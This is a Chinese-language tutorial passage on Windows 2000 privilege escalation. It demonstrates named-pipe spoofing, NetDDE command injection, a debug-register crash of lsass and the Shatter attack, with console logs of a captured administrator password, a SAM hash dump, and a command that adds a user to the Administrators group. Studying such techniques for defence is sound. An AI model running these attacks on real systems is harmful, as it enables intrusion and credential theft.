講到Exploit都會涉及到提升權(quán)限的問題，所謂提升權(quán)限就是利用系統(tǒng)的漏洞來獲得更高的Privilege。比如說，你用一般用戶的賬號登錄Windows NT/Windows 2000后，你就只能作有限的操作，卻不能加減用戶，不能往系統(tǒng)目錄中存寫文件等等；但等到你通過系統(tǒng)的漏洞獲得了Administrator或者Local System的權(quán)限以后，你也就可以作這些事了。我研究Exploit的時間并不是很長，但看到有關(guān)在Windows操作系統(tǒng)中提升權(quán)限的方法與實例還真不少。剛才到Google上用關(guān)鍵詞“microsoft”、“Windows”、“privilege”、“elevation”去搜索一下，居然返回3000多個結(jié)果。要知道，這還只是公布出來的部分，江湖中還有很多必殺絕技是不輕易示人的。要想在這里詳細(xì)地介紹所有Windows中提升權(quán)限的方法，我的功力是遠(yuǎn)遠(yuǎn)不夠的----估計相當(dāng)于丐幫一袋弟子的水平而已。所以呢，這一章所針對的讀者應(yīng)該是丐幫的入門弟子，如果你們哪位功力要用兩個以上的麻袋來裝的話，請盡管跳過這一章。我在選擇這一章的Exploit例子時，有意選擇針對W2K操作系統(tǒng)、附帶有源程序的例子，這樣方便大家在自己的機器上試驗。這些Exploit并不是每個都成功，但是我感覺它們有不少可借鑒之處，可以通過學(xué)習(xí)它們來了解黑客的思路，從而提高自己的反入侵能力。記住我的機器dallas是W2K Service Pack 1，如果你們的計算機運行不同版本的W2K Service Pack，這些Exploit可能需要改動。順便說一句，實際上在第一章里面我們已經(jīng)提到一種在Unix或者Linux中提升權(quán)限的方法，就是去Exploit超級用戶Root所有的、具有SUID位的執(zhí)行程序。在Windows操作系統(tǒng)中，沒有SUID這種說法，但是有一種RunAs服務(wù)(Service)進程可以提供類似于SUID的功能，而且是有可能被Exploit的。利用Windows 2000中的Named Pipe來提升權(quán)限Windows 2000中的RunAs服務(wù)進程可以讓用戶甲以用戶乙的權(quán)限運行程序，這類似于Unix和Linux系統(tǒng)中SUID位功能。W2K中的一個API：CreateProcessWithLogonW就利用了RunAs服務(wù)進程，用戶甲調(diào)用這個CreateProcessWithLogonW時把用戶乙的賬號(Account)、域(Domain)、密碼(Password)提交給Windows操作系統(tǒng)作Authentication，如果Authentication成功，那么就接著運行指定的程序，而且這個程序運行時具有用戶乙的權(quán)限。CreateProcessWithLogonW API的定義如下：BOOL CreateProcessWithLogonW(LPCWSTR , // 用戶乙的賬號(Account)LPCWSTR , //用戶乙的域(Domain)LPCWSTR , // 用戶乙的密碼(Password)DWORD , // logon optionLPCWSTR , // executable module nameLPWSTR , // command-line stringDWORD , // creation flagsLPVOID , // new environment blockLPCWSTR , // current directory nameLPSTARTUPINFOW , // startup informationLPPROCESS_INFORMATION // process information);那么CreateProcessWithLogonW是如何把用戶乙的賬號信息傳給RunAs服務(wù)進程的呢？在Windows操作系統(tǒng)中有很多Interprocess Communication的方法，大概最常見的就是 Pipe了。我們在上一章對IIS的Exploit中也用到了Pipe，不過那是沒有名字的pipe (Anonymous Pipe)；在這里CreateProcessWithLogonW是用有名字的Pipe(named Pipe)與RunAs聯(lián)絡(luò)的，這個named Pipe就是“\\.\pipe\secondarylogon”。到目前為止，一切都正常。大家要問：RunAs的漏洞在哪里呢？它的漏洞是如何被Exploit的呢？根據(jù)RADIX Team的解釋：當(dāng)用戶甲用CreateProcessWithLogonW創(chuàng)建具有用戶乙權(quán)限的進程時，它是不會核實“\\.\pipe\secondarylogon”的Server端究竟是連通到RunAs進程還是連通到其它的進程。如果RunAs服務(wù)進程在某一時刻停止運行的話，黑客進程可以趁機創(chuàng)建一個也叫“\\.\pipe\secondarylogon”的named Pipe，然后黑客進程就假裝成RunAs服務(wù)進程在Pipe的Server端等著接受信息。接著我們無辜而無知的用戶甲調(diào)用CreateProcessWithLogonW了，它也不先調(diào)查一下Named Pipe另一端的進程身份，就把用戶乙的賬號信息由偽造的named Pipe傳了過去，傳呀傳，傳呀傳，一直傳到黑客程序的耳朵里。RADIX Team還編寫了一個Exploit程序radix1112200101，這個程序把通過Named Pipe “\\.\pipe\secondarylogon”傳來的用戶乙賬號信息(包括用戶名、域名、密碼)統(tǒng)統(tǒng)顯示出來。限于篇幅，我就不轉(zhuǎn)載這個程序了，大家可以到他們的網(wǎng)站去看。不過這里我準(zhǔn)備演示一下在dallas上如何使用radix1112200101來獲得dallas本地域(Local Domain)的超級用戶Administrstor的密碼。被Exploit的程序(就是因為使用CreateProcessWithLogonW而泄密的家伙)叫radixvictim.cpp，它以超級用戶Administrator的權(quán)限啟動一個NotePad程序。<==========================radixvictim.cpp===============================>// radixvictim.cpp : Defines the entry point for the application.//#define _WIN32_WINNT 0x0500#define UNICODE#include #include #include #include int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow = SW_SHOW){// TODO: Place code here.LPCWSTR lpUsername = L"Administrator"; // user's nameLPCWSTR lpDomain = L"dallas"; // user's domainLPCWSTR lpPassword = L"moda"; // user's passwordDWORD dwLogonFlags = LOGON_NETCREDENTIALS_ONLY; // logon optionLPCWSTR lpApplicationName = L"D:\\Winnt\\NotePad.exe"; LPWSTR lpCommandLine = L"NotePad.exe"; // command-line stringDWORD dwCreationFlags = CREATE_NEW_CONSOLE; // creation flagsLPVOID lpEnvironment = NULL; // new environment blockLPCWSTR lpCurrentDirectory = NULL; // current directory nameSTARTUPINFO StartupInfo; // startup informationPROCESS_INFORMATION ProcessInfo; // process informationBOOL ret;ZeroMemory(&StartupInfo, sizeof(StartupInfo));StartupInfo.cb = sizeof(StartupInfo);ZeroMemory(&ProcessInfo, sizeof(ProcessInfo));ret = CreateProcessWithLogonW(lpUsername, lpDomain, lpPassword, dwLogonFlags, lpApplicationName, lpCommandLine, dwCreationFlags, lpEnvironment, lpCurrentDirectory, &StartupInfo, &ProcessInfo );if (! ret ) ExitProcess (GetLastError()) ;return 0;}<================================================================>在偽造Named Pipe之前，必須關(guān)閉RunAs的“\\.\pipe\secondarylogon”，要不然運行radix1112200101會得到Permission Denied之類的錯誤。我先以超級用戶Administrator登錄dallas，然后從Administrative Tools->Services中終止RunAs服務(wù)進程 (一般的情況下，只有超級用戶Administrator才能終止RunAs服務(wù)進程)。這樣RunAs擁有的“\\.\pipe\secondarylogon”就關(guān)閉(Close)了。再以我的一般用戶賬號moda登錄dallas，接著運行radix1112200101偽造一個新的Named Pipe “\\.\pipe\secondarylogon”。D:\MyJob\securitylab\radix\Debug>radix1112200101Created pipe and waiting for clients...怎么確定“\\.\pipe\secondarylogon”被成功地創(chuàng)建了呢？我們可以使用pipelist程序，這是我從sysinternals網(wǎng)站下載的寶貝之一，它能列出系統(tǒng)中所有的Named Pipe：D:\MyJob\tool\pipelist\RELEASE>pipelistPipeList v1.01by Mark Russinovichhttp://www.sysinternals.comPipe Name Instances Max Instances--------- --------- -------------InitShutdown 2 -1lsass 5 -1ntsvcs 50 -1scerpc 2 -1net\NtControlPipe1 1 1DhcpClient 1 -1net\NtControlPipe2 1 1Winsock2\CatalogChangeListener-194-0 1 1net\NtControlPipe3 1 1spoolss 2 -1。。。。。。。。。。。。。。net\NtControlPipe21 1 1tapsrv 2 -1ROUTER 2 -1WMIEP_2ac 2 -1WMIEP_154 2 -1SecondaryLogon 1 10D:\MyJob\tool\pipelist\RELEASE>你們看到，最后一個Named Pipe就是radix1112200101剛剛偽造Secondarylogon?，F(xiàn)在運行radixvictim。對於這個程序，用戶甲就是無辜而無知的“moda”，而用戶乙就是超級用戶Administrator。請注意Exploit程序radix1112200101的輸出：D:\MyJob\securitylab\radix\Debug>radix1112200101Created pipe and waiting for clients...Read 4 bytes. (ASCII Dump)>? Read 318 bytes. (ASCII Dump)□? ? 8X j □ □? ? ? - -? A d m i ni s t r a t o r? d a l l as ? m o d a* D: \ W i n n t \N o t e P a d .e x e ? N ot e P a d . e xe lD H lW i n St a 0 \ D e f au l t _D:\MyJob\securitylab\radix\Debug>你們可以看到，超級用戶Administrator的信息(包括密碼)全部都被radix1112200101接收到了。得到Administrator的賬號信息后，再提升權(quán)限就易如反掌了！這個Exploit的關(guān)鍵在于：第一，Named Pipe的名字是廣為人知的，黑客的Named Pipe也可以貼上同樣的名字“\\.\pipe\secondarylogon”去冒充；第二，CreateProcessWithLogonW在使用Named Pipe之前并沒有核實Named Pipe的Server端進程，它不管Server端是連通到RunAs進程還是到其它的進程。類似的這樣問題是在Windows操作系統(tǒng)中是廣泛存在的，再看下面的例子：我是在網(wǎng)站http：//www.dogmile.com上看到的這個例子的，作者為maceo。根據(jù)maceo的研究，Windows 2000操作系統(tǒng)廣泛使用了Named Pipe來控制(或者說管理)服務(wù)進程，包括象Clipbook服務(wù)進程呀、Telnetd服務(wù)進程呀等等，而且這些Named Pipe的名字是可以猜得到的。如果黑客搶先用猜到的名字創(chuàng)建Named Pipe的話，服務(wù)進程啟動時會直接連接到黑客的Named Pipe上，於是黑客程序就可以通過ImpersonateNamedPipeClient()取得服務(wù)進程的權(quán)限(缺省設(shè)置為Local System權(quán)限)。那么，黑客是怎樣猜到這些Named Pipe的名字的呢？很簡單，他是從Registry中查詢到的，在下面的地址：HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ServiceCurrent如果ServiceCurrent的雙字值(DWORD Value)是X，那么服務(wù)進程所用到的Named Pipe的名字就是“\\.\pipe\net\NtControlPipe(X 1)”，這也就是黑客要偽造的Named Pipe的名字。maceo給出了幾個Exploit程序，我下面就在Dallas上演示其中的一個----PipeUp。這個Exploit程序首先從Registry中取得下一個服務(wù)進程要使用的Named Pipe名字，然后搶先創(chuàng)建這個Named Pipe；緊接著它啟動服務(wù)進程ClipBook，由于ClipBook啟動后會主動連接這個偽造的Named Pipe，於是PipeUp就通過函數(shù)ImpersonateNamedPipeClient而獲取了Local System的賬號權(quán)限(因為ClipBook一般以Local System的賬號運行)。這樣進程PipeUp就有足夠的權(quán)限把Local System在Security Account Manager(SAM)中的信息讀出來。你們可以從網(wǎng)站http：//www.dogmile.com下載這個Exploit的源程序，這里限于篇幅我就不轉(zhuǎn)載這個程序了(畫外音：其實是限于版權(quán))。先以Administrator的賬號登錄dallas，把ClipBook服務(wù)進程停止。再以一般用戶moda登錄，運行Exploit程序PipeUp，下面是PipeUp運行及Exploit的結(jié)果：D:\MyJob\securitylab\PipeUp\Debug>pipeupThe ClipBook service is not started.More help is available by typing NET HELPMSG 3521.Impersonating: SYSTEMDumping SAM for RID 500 ...F:0x020001000000000010f3e3f89b33c2010000000000000000f0a09fa11061c101ffffffffffffff7fb0c25115f430c201f401000001020000100200000000000000002a010100000000000d000a000000V:0x00000000a800000002000100a80000001a00000000000000c40000000000000000000000c40000006c000000000000003001000000000000000000003001000000000000000000003001000000000000000000003001000000000000000000003001000000000000000000003001000000000000000000003001000000000000000000003001000000000000000000003001000008000000010000003801000014000000000000004c0100001400000000000000600100000400000000000000640100000400000000000000010014808800000098000000140000003000000002001c000100000002c01400440005010101000000000001000000000200580003000000000014005b03020001010000000000010000000000001800ff070f00010200000000000520000000200200000000240044000200010500000000000515000000dde8e41c32621f2a8aa7323ff40100000102000000000005200000002002000001020000000000052000000020020000410064006d0069006e006900730074007200610074006f00720000004200750069006c0074002d0069006e0020006100630063006f0075006e007400200066006f0072002000610064006d0069006e006900730074006500720069006e0067002000740068006500200063006f006d00700075007400650072002f0064006f006d00610069006e000102000007000000010001001913f29278bf71eaff44492fb2f9ed05010001002a730d35666e44ffa4f37b29011d882f0100010001000100D:\MyJob\securitylab\PipeUp\Debug>大家看了上面兩個例子有什么想法呢？肯定有人會覺得這些Exploit有“做弊”的嫌疑：一方面，在radix1112200101(或PipeUp)運行之前，RunAs(或ClipBook)服務(wù)進程都必須先終止運行，這樣黑客進程才有可能偽造Named Pipe，才有機會竊取Administrator(或Local System)的賬號信息；而另一方面，黑客必須先取得至少Administrator的權(quán)限才能終止RunAs(或ClipBook)進程。這兩個方面看起來是互為前提條件的，是個無解的“Deadlock”。實際上，我在SecurityFocus網(wǎng)站上看到Microsoft針對Exploit程序radix1112200101的回復(fù)，它指出這個Exploit是兩難的，現(xiàn)實中不太可能發(fā)生。要實現(xiàn)這個Exploit確實有些難度，但是這并不等于不會發(fā)生！假如某個服務(wù)進程有Bugs，象緩沖區(qū)溢出呀、Signal不當(dāng)reentrant呀等等，那么在運行中這個服務(wù)進程就有可能被黑客故意整垮掉(Crash)，然后黑客就可以偽造它的Named Pipe，再利用上面的Exploit程序提升其權(quán)限。而且有時候我們并不需要先終止服務(wù)進程，我在Microsoft的Security Bulletins網(wǎng)站上找到一個例子----編號為MS01-031的一篇文章 “Predictable Name Pipes Could Enable Privilege Elevation Via Telnet”。中文大意是說：當(dāng)你通過Telnet遠(yuǎn)程聯(lián)線到Windows 2000系統(tǒng)中的Telnetd服務(wù)進程時，Telnetd會創(chuàng)建一個新的Named Pipe，同時運行這個Named Pipe攜帶的初始化程序。由于這個Named Pipe的名字是可以猜到的(Predictable)，所以黑客可以搶先用猜到的名字創(chuàng)建這個Named Pipe，同時讓這個Named Pipe攜帶黑客碼作為初始化程序；當(dāng)Telnetd服務(wù)進程發(fā)現(xiàn)這個Named Pipe已經(jīng)存在時，它既不重新創(chuàng)建一個新的Named Pipe，也不核實一下這個Named Pipe的創(chuàng)建者是否可以信賴(Trustable)，相反，它直接使用這個Named Pipe，并且把其攜帶的黑客碼當(dāng)成初始化程序運行。由于在缺省設(shè)置的情況下，Telnetd服務(wù)進程具有Local System的權(quán)限，所以黑客碼也將以這個最高的權(quán)限橫沖直撞。Microsoft的文章并沒有告訴我們這個可以猜得到的Named Pipe名字是什么----這是可以理解的，畢竟誰也不會開門掬盜。不過我在dallas上作了個試驗：分別聯(lián)結(jié)兩個Telnet Session到Dallas上，然后用Pipelist程序觀察在Telnet后Named Pipe的變化情況：D:\MyJob\tool\pipelist\Debug>pipelistPipeList v1.01by Mark Russinovichhttp://www.sysinternals.comPipe Name Instances Max Instances--------- --------- -------------InitShutdown 2 -1lsass 5 -1ntsvcs 52 -1scerpc 2 -1net\NtControlPipe1 1 1。。。。。。。。。。tapsrv 2 -1ROUTER 2 -1WMIEP_644 2 -1WMIEP_2c8 2 -1net\NtControlPipe28 1 1telnetd\000001fc.00000000 1 1telnetd\000001fc.00000001 1 1telnetd\000001fc.00000002 1 1telnetd\000001fc.00000003 1 1上面用黑體字標(biāo)出來的Named Pipe：net\NtControlPipe28屬于Telnetd服務(wù)進程，而telnetd\000001fc.00000000與telnetd\000001fc.00000001屬于第一個Telnet Session，telnetd\000001fc.00000002與telnetd\000001fc.00000003屬于第二個Telnet Session。如果這時有第三個用戶Telnet進來的話，Telnetd要用到的Named Pipe名字將會是telnetd\000001fc.00000004與telnetd\000001fc.00000005，我敢賭100塊錢?。。∧銈兛吹?，這個例子并不需要終止任何服務(wù)進程，理論上說你只需要具有一般用戶賬號就可以提升你的權(quán)限到Local System級別：先以一般用戶賬號偽造Named Pipe并讓它附帶黑客碼作為初始化程序，然后以同一賬號遠(yuǎn)程聯(lián)線到象dallas這樣的機器上，Telnetd服務(wù)進程會主動運行你附帶在Named Pipe上的黑客碼，而且你的黑客碼是以Local System權(quán)限運行。利用Windows 2000中的Dynamic Data Exchange來提升權(quán)限：我是在www.atstake.com網(wǎng)站的Security Advisory欄目(2001年2月版)看到這篇文章：“NetDDE Message Vulnerability”，作者是DilDog。搞這一行有些日子的人大概都看過他的另一篇非常有名、非常經(jīng)典的文章：“The Tao of Windows Buffer Overflow”；這篇文章被其他人引用的次數(shù)很多，如果拿這篇文章的引用率來評職稱，肯定是非常的Solid----就是很硬的意思！在那一篇文章中，他詳細(xì)地介紹了在Windows NT系統(tǒng)中如何發(fā)現(xiàn)NetMeeting的緩沖區(qū)溢出，如何一步一步編寫黑客碼去Exploit這個缺口(Vulnerability)。實際上，在前面兩章的Exploit試驗中我所用到的羅馬大道“Jmp esp”，以及函數(shù)指令表都直接或間接地借鑒了他的思路。有興趣的朋友可以到下面的網(wǎng)頁去拜讀一下這篇大作： http://www.cultdeadcow.com/cDc_files/cDc-351/index.html好，回到正題：如何利用Dynamic Data Exchange來提升權(quán)限？我們曾經(jīng)提到過，在Windows操作系統(tǒng)有多種Interprocess Communication的方法，Named Pipe是常見的一種，而Dynamic Data Exchange(DDE)則是另一種常見的方法，它是通過共享內(nèi)存來實現(xiàn)不同進程間的動態(tài)數(shù)據(jù)交換。這些動態(tài)交換的數(shù)據(jù)叫DDE Share，它們由DDE Server創(chuàng)建并由Network DDE DSDM (DDE share database manager)服務(wù)進程管理。你可以在Dos窗口下運行命令DDESHARE來顯示你計算機上的DDE Share，常見的DDE Share有Chat$、CLPBK$、Hearts$。當(dāng)管理DDE Share的Network DDE DSDM服務(wù)進程運行時，Winlogon會在當(dāng)前登錄用戶的Desktop產(chǎn)生一個隱藏式的Window，這個隱藏式的Window名字為"NetDDE Agent"，是一個"NDDEAgnt"類的window class，它的功能在于協(xié)助DDE Server程序及DDE Client程序之間的數(shù)據(jù)交換。由于它由Winlogon創(chuàng)建，這個Window的進程就以Local System的權(quán)限運行在登錄用戶的Desktop上，只不過用戶看不到它而已。"NetDDE Agent"還有另外一個輔助功能：當(dāng)DDE Client試圖連接到一個Trueted的DDE Share時，如果"NetDDE Agent"發(fā)現(xiàn)創(chuàng)建這個DDE Share的DDE Server尚未運行，它會主動啟動這個Server。記住"NetDDE Agent"進程是具有Local System權(quán)限的，所以它啟動Server沒有一點問題。根據(jù)DilDog的研究，這個隱藏式的"NetDDE Agent"就是一個缺口(Vulerability)！還記得Window操作系統(tǒng)中的函數(shù)SendMessage()嗎？登錄用戶可以利用這個函數(shù)向Desktop上的任何Window發(fā)送Message，即使這個Window不屬于當(dāng)前登錄用戶。所以黑客在以一般用戶的身份登錄后，可以用SendMessage()發(fā)送一個WM_COPYDATA message給"NetDDE Agent"，這個Message里面同時攜帶著一個精心炮制的數(shù)據(jù)塊作為調(diào)用參數(shù)。這個數(shù)據(jù)塊包含以下內(nèi)容：1。 一個Trusted DDE Share的名字，比如說Chat$；2。 一個用于啟動DDE Server的命令，如果"NetDDE Agent"發(fā)現(xiàn)創(chuàng)建Chat$的DDE Server尚未運行，就根據(jù)這個命令來啟動DDE Server。但是黑客可以任選一個命 令來偽造，比如說“Net Localgroup Administrators /Add 阿貓”----這里的阿 貓已經(jīng)是合法的一般用戶了；3。 一些固定不變的字節(jié)。DilDog認(rèn)為是這些字節(jié)應(yīng)該是隨機產(chǎn)生的，而不應(yīng)該固定 不變。我個人理解這些字節(jié)是用于向"NetDDE Agent"或Network DDE DSDM證明 WM_COPYDATA message是由合法程序(而不是黑客程序)發(fā)出的，所以它們應(yīng)該隨機 變化而不讓黑客輕易得到。當(dāng)"NDDEAgnt"接收到WM_COPYDATA message時，它核對后會發(fā)現(xiàn)第三部分的字節(jié)正確無誤，而且Trusted DDE Share確實存在，於是它就執(zhí)行黑客命令，由于"NDDEAgnt"具有Local System權(quán)限，它可以順利地讓阿貓同志光榮地加入本地Administrator Group。DilDog在文章中還附帶了一個Exploit程序netddemsg，我接下來就在dallas上演示一下我自己是如何追隨阿貓加入本地Administrators Group的：/*先以我的用戶賬號“moda”登錄dallas?？纯幢镜豠dministrators Group有哪些成員：*/D:\MyJob\securitylab\netddemsg\Debug>net localgroup administratorsAlias name administratorsComment Administrators have complete and unrestricted access to the Members-----------------------------------------------------------------------------a_maoAdministratorThe command completed successfully./*本地administrators Group目前只有兩個成員，Administrator和a_mao。試著把“moda”加入到本地administrators Group中：*/D:\MyJob\securitylab\netddemsg\Debug>net localgroup administrators /add modaSystem error 5 has occurred.Access is denied./*我的權(quán)限顯然不夠，所以得到error 5。運行DilDog的Exploit程序，同時附帶上我的黑客命令：*/D:\MyJob\securitylab\netddemsg\Debug>netddemsg -s Chat$ net localgroup administrators /add moda/*程序運行結(jié)束，讓我們看看“moda”是否加入本地administrators Group：*/D:\MyJob\securitylab\netddemsg\Debug>D:\MyJob\securitylab\netddemsg\Debug>net localgroup administratorsAlias name administratorsComment Administrators have complete and unrestricted access to the Members-----------------------------------------------------------------------------a_maoAdministratormodaThe command completed successfully.D:\MyJob\securitylab\netddemsg\Debug>/*我也光榮地加入了本地administrators Group*/利用Windows 2000/Intel中的Debug Register來提升權(quán)限：我是在Georgi Guninski的個人網(wǎng)站(http://www.guninski.com)上看到這篇文章：“Elevation of Privileges with debug registers on Win2k”，介紹如何利用Intel X86中的Debug Register來獲取Local Administrator的權(quán)限。我的運氣不太好，用文章中的Exploit程序Pipe3試了幾次也不能成功，不過覺得利用Debug Register來攻擊是個新的思路，所以就在這里順便介紹一下。Intel X86的Debug Register(DR0-DR7寄存器)是所有進程共用的。也就是說，你在一般用戶進程中下一個絆子(就是設(shè)置一個斷點)，沒準(zhǔn)會把某個系統(tǒng)進程或者服務(wù)進程(Service)絆一跤；這一跤要是把系統(tǒng)/服務(wù)進程摔垮了，導(dǎo)致它停止執(zhí)行的話，你沒準(zhǔn)就可以偽造該進程的Named Pipe；然后當(dāng)有其它進程企圖通過Named Pipe與垮掉的系統(tǒng)/服務(wù)進程聯(lián)絡(luò)時，黑客就可以利用函數(shù)ImpersonateNamedPipeClient來竊取其它進程的權(quán)限----這很可能就是Local System的權(quán)限。文章中的Exploit程序Pipe3(請從網(wǎng)站http://www.guninski.com下載)就是按照這個思路設(shè)計的：它要整垮的進程是lsass，所以必須先找?guī)讉€lsass進程將要運行的指令的地址，以便在這些地址設(shè)置斷點(也就是搞清楚lsass要走哪一條路，我們才好在那條路上設(shè)絆腳石)；然后Pipe3以一般用戶的權(quán)限運行程序Calc(計算器)，并在其中設(shè)置斷點，因為這斷點的地址是在lsass運行的途徑上，所以它們并不會影響Calc進程；過不了多久lsass就會有報告“SingleStep Exception”并讓你選擇是中斷l(xiāng)sass運行還是Debug lsass進程；選擇中斷l(xiāng)sass以便關(guān)閉lsass擁有的Named Pipe----\'5c.\pipe\lsass"，這樣Pipe3就可以偽造一個同名的Named Pipe；。。。。。。這以后的幾步我想就不用重復(fù)了，大家都應(yīng)該清楚。下面說說我Exploit的情況：先用WinDbg找到lsass可能要運行的指令地址，lsass有多個Thread，我從不同Thread的ESP寄存器中找了幾個地址。然后以我的一般用戶名“moda”登錄dallas。最后讓Pipe3在這些地址分別設(shè)斷點，總有那么一個地址會成功地中斷l(xiāng)sass程，并且產(chǎn)生一個Warning對話框(Dialog Box)報告“SingleStep Exception”。當(dāng)我選擇中斷進程后， lsass退出執(zhí)行，Pipe3報告“LSA died!”：D:\MyJob\securitylab\pipe3\Debug>pipe3Fun with debug registers. Written by Georgi Guninskivvdr started: lsasspid=240 breakp=5ffebcLSA died!Stop writing to pipestart \\.\pipe\lsassFailed to create named pipe:\\.\pipe\lsass由于lsass是重要的系統(tǒng)進程，它的終止運行將使系統(tǒng)在一分鐘內(nèi)自動Shutdown。另外我們注意到， \\.\pipe\lsass并沒有成功地創(chuàng)建。為什么呢？我搶在系統(tǒng)Shutdown之前運行了一下Pipelist：D:\MyJob\securitylab\pipe3\Debug>pipelistPipeList v1.01by Mark Russinovichhttp://www.sysinternals.comPipe Name Instances Max Instances--------- --------- -------------InitShutdown 2 -1lsass 2 -1ntsvcs 49 -1scerpc 2 -1net\NtControlPipe1 1 1DhcpClient 1 -1net\NtControlPipe2 1 1。。。。。。。。。。。。。。。。很奇怪，雖然lsass進程終止運行，但是它的Named Pipe還在----這大概是Pipe3沒能創(chuàng)建“\\.\pipe\lsass”的原因。由于時間的關(guān)系，我沒能深入研究這個問題，不過哪位朋友要是用Pipe3成功地實現(xiàn)Exploit的話，不要忘記告訴我一聲！不過話又說回來，這種利用Debug Register來終止lsass進程的方法----即使成功的話，也太暴露了：整個系統(tǒng)居然會Shutdown！任何一個傻瓜管理員都會發(fā)現(xiàn)有黑客入侵。這大概是黑客中的業(yè)余水平。好一點的黑客要做到“輕輕的我走了，正如我輕輕的來”，要象偉大的詩人兼武林高手徐自摩那樣施展一把輕功，讓傻瓜管理員根本發(fā)現(xiàn)不了，當(dāng)然耳朵厲害的管理員還是會發(fā)現(xiàn)的----“誰？有黑客！抓黑客！”。水平達(dá)到最高境界的黑客應(yīng)該是能夠羚羊掛角、踏雪無痕的，這就不是我能評論的了。利用Win32 API的設(shè)計缺陷提升權(quán)限：幾個星期以前我在計算機安全網(wǎng)站上看到兩篇新發(fā)表的文章：<>、<>，作者是Chris Paget(網(wǎng)名Foon)，我建議大家去下面的網(wǎng)址讀一下他的原著：http://security.tombom.co.uk/shatter.htmlhttp://security.tombom.co.uk/moreshatter.html。這兩篇文章詳細(xì)地介紹了如何利用Win32 API的一個設(shè)計缺陷來提升普通用戶的權(quán)限。我們前面也提到，普通用戶的進程可以向他/她的Desktop上任何Window發(fā)送Message，讓目標(biāo)Window執(zhí)行用戶指定的操作，比如說COPY/PASTE(拷貝/沾貼)、定時運算(Timer)等等。這個Window可能屬于用戶自己，也可能屬于Local System(象"NetDDE Agent")----這樣問題就來了：---- 普通用戶如你我他她它(比爾蓋茨說狗也可能上網(wǎng)的，所以我們要算上“它”)在 他的Desktop上先找到一個屬于Local System的Window，我們給這個Window起一個 名字叫WINDOWXYZ，這個WINDOWXYZ上最好有能接收沾貼內(nèi)容的Control(比如說 EDIT)；---- 用戶可以把黑客碼用“WM_PASTE”(Message之一)沾貼到WINDOWXYZ的Control里；---- 用戶找到被沾貼的黑客碼在WINDOWXYZ進程中的地址；---- 用戶然后發(fā)送“WM_TIMER”(Message之二)給WINDOWXYZ，同時把黑客碼地址作為 參數(shù)一并傳給WINDOWXYZ，WINDOWXYZ於是執(zhí)行定時運算，開始運行黑客碼。這些 黑客碼是以Local System的權(quán)限運行的，所以普通用戶的權(quán)限被成功地提升。---- 實際上，根據(jù)FOON的文章，即使普通用戶在其Desktop上找不到屬于Local System的Window，他也有辦法提升權(quán)限：他可以利用Tool Help函數(shù)得到屬于 Local System的進程及其Thread，只要其中任何一個Thread能處理Window的 Message，用戶就可以用函數(shù)PostThreadMessage()向這個屬于Local System的 Thread發(fā)送Message，然后就。。。如此這般。。。地提升權(quán)限。不過我沒有時間 親手試驗過這種方法。這兩篇文章引起了很大的反響，其中最引人注意的是Microsoft的答復(fù)，Micorsoft說這種方法老早就有人提出來了，Nothing New！又說根本就不應(yīng)該在普通用戶的Desktop上創(chuàng)建屬于Local System的Window，編程序的人應(yīng)該避免這樣的設(shè)計。但實際上隱藏式的窗口"NetDDE Agent"就出自于Microsoft的設(shè)計，它屬于Local System但是卻運行在登錄用戶的Desktop上，看來Microsoft是知法犯法??！我覺得這個缺陷就象不安全的函數(shù)strcpy一樣，C語言在實現(xiàn)strcpy函數(shù)時有漏洞 (函數(shù)返回地址、函數(shù)堆棧棧底地址等系統(tǒng)管理信息與緩沖區(qū)分配在一塊，緩沖區(qū)的溢出就會覆蓋系統(tǒng)管理信息)，於是大家寄希望于程序員能夠避免使用函數(shù)strcpy?，F(xiàn)在Microsoft也承認(rèn)在普通用戶的Desktop上創(chuàng)建一個Window是危險的，所以它也寄希望于大家編程時避免使用這樣的設(shè)計。下面我專門編寫了一個服務(wù)進程“SimpleService”來演示一下Microsoft的這個設(shè)計缺陷。SimpleService以Local System的權(quán)限運行，它打開一個Named Pipe然后等待Named Pipe Client與它聯(lián)絡(luò)；普通用戶接著登錄計算機并運行程序“Client”，“Client”是一個Named Pipe Client；它向SimpleService的Named Pipe隨便寫一些字節(jié)，於是SimpleService就在登錄用戶的Desktop上產(chǎn)生一個對話窗口(Dialog Box)。普通用戶最后利用FOON的攻擊程序Shatter攻擊這個對話窗口來獲得“Local System”的權(quán)限。因為SimpleService程序太長，所以我只節(jié)選了關(guān)鍵的部分讓大家參考：<=======================SimpleService==========================>#define SZAPPNAME _T("Simple")#define SZSERVICENAME _T("SimpleService")#define SZSERVICEDISPLAYNAME _T("Simple Service")#define SZDEPENDENCIES _T("")typedef struct DLGPARAM{UINT numOfHit;TCHAR *msg;} DlgParam;// internal function prototypesstatic BOOL CALLBACK DialogProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam);// SimpleService.cpp : Defines the entry point for the application.//HINSTANCE hAppInstance;DlgParam m_dlgParam;int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow){......}void WINAPI service_main(){......}VOID WINAPI service_ctrl(DWORD dwCtrlCode){......}BOOL WINAPI ControlHandler ( DWORD dwCtrlType ){......}HANDLE hServerStopEvent = NULL;VOID ServiceStart (){............hPipe = CreateNamedPipe(lpszPipeName , // name of pipeFILE_FLAG_OVERLAPPED |PIPE_ACCESS_DUPLEX, // pipe open modePIPE_TYPE_MESSAGE |PIPE_READMODE_MESSAGE |PIPE_WAIT, // pipe IO type1, // number of instances0, // size of outbuf //(0 == allocate as necessary)0, // size of inbuf1000, // default time-out value&sa); // security attributes............while ( 1 ){............ConnectNamedPipe(hPipe, &os);............bRet = ReadFile(hPipe, // file to read fromszIn, // address of input buffersizeof(szIn), // number of bytes to read&cbRead, // number of bytes read&os); // overlapped stuff, not needed............_stprintf(szOut, _T("Please check the Dialog Box"));_stprintf(szOut1, _T("Eacho Back! [%s]"), szIn);............bRet = WriteFile(hPipe, // file to write toszOut, // address of output buffersizeof(szOut), // number of bytes to write&cbWritten, // number of bytes written&os); // overlapped stuff, not needed............ DisconnectNamedPipe(hPipe);m_dlgParam.numOfHit ;m_dlgParam.msg = szOut1;/*在登錄用戶的Desktop上創(chuàng)建一個窗口*/int result = DialogBoxParam(hAppInstance,MAKEINTRESOURCE(IDD_SVCMSG), NULL,(DLGPROC) DialogProc,(LPARAM) &m_dlgParam);}cleanup:............}VOID ServiceStop(){if ( hServerStopEvent )SetEvent(hServerStopEvent);}#define SIZEOFBUF 40/*Window的Message Handler*/BOOL CALLBACK 